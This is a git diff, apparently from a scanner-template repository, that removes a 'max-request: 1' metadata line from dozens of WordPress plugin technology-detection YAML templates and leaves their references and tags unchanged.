diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index dbea07a6da..da63d1cbf6 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index 17a8f220cf..f94e7f6494 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 956a08b32d..95d2aa5f16 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index 5a570b9077..af8193b875 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
-    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 4ecac0cd92..8d7e45818b 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
-    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index e50f58cef8..ed3967db7b 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
-    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 031bb48563..2ff5adba86 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
-    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 3cdcf3da93..9099f3c0a5 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
-    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index c222bc9d4a..1ee0e67542 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
-    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 9c6e3e6d2e..1778552d75 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
-    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 66b7d6a363..7ba81036cf 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index a36016562d..24fc3e3295 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
-    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 8033aacbc6..3e89505574 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e4017b1a0a..e701e365ba 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index 53d6d393bd..c0cc5400a8 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index c286e9a14f..22687bcffe 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
-    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index 364e3cd71e..b69d3d5bfe 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
-    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 4fcccbfc33..7975a57702 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index 3fbc714d3b..ff4cef94d7 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index c49b506979..a8903697b0 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
-    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index dfcaf6f71b..3f141c4476 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
-    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 61be246fee..5355e988a2 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
-    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 50d2e6630b..53d409fb68 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 8d71f7bde9..0e908a9580 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index 5e1f97086e..aeb1875c57 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
-    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index d87d456a8c..7c15702305 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
-    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index aa9153241e..5ce87e6c71 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
-    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index 09641796a3..c342e6b45a 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
-    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index 28b70d09bf..e95041f555 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
-    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index b43c10ed7a..879a0d1c12 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
-    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index eb7e78bc7f..985f5d373a 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
-    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index 3da2ea50e1..bbc305b8de 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
-    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7a58c58f63..7e3e4e2d7e 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
-    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 5f99b8cac8..17ea142c46 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
-    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index b08876df04..953e4ab3d8 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
-    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 3f68dffe06..92107fa69c 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
-    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 34f9bde1d6..5e1fe4ef5c 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
-    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index d9f645328f..74fb3e6010 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
-    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index 8a1196fc9f..b9f70ba555 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
-    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 05025452b7..6486c02c9a 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
-    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 1db1b57708..81f58198d3 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index dafe6974f6..3743307dbc 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
-    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index ba05fb1e16..a4c6980041 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
-    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index a038adac53..e085f30e5a 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index 7f98d822a8..adf3387ddb 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
-    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index 89602f4264..eb6e1aaa5d 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
-    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index 2f6513ca42..b3c83cd0bf 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
-    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 982306b13c..96d8bd6aca 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
-    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index fdcac13b56..85955ac95e 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index fc316f9f7a..a81fc892ca 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
-    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index 975b63f5de..d9c6052cd7 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index 5065659e82..afc1141e0c 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
-    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index 732ffbc4eb..d44add9ca6 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 12dffeb534..20ba5c2e16 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index ae0e76c4bb..cbcf3cf09d 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
-    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index b1718d1ccb..3311d42c94 100644
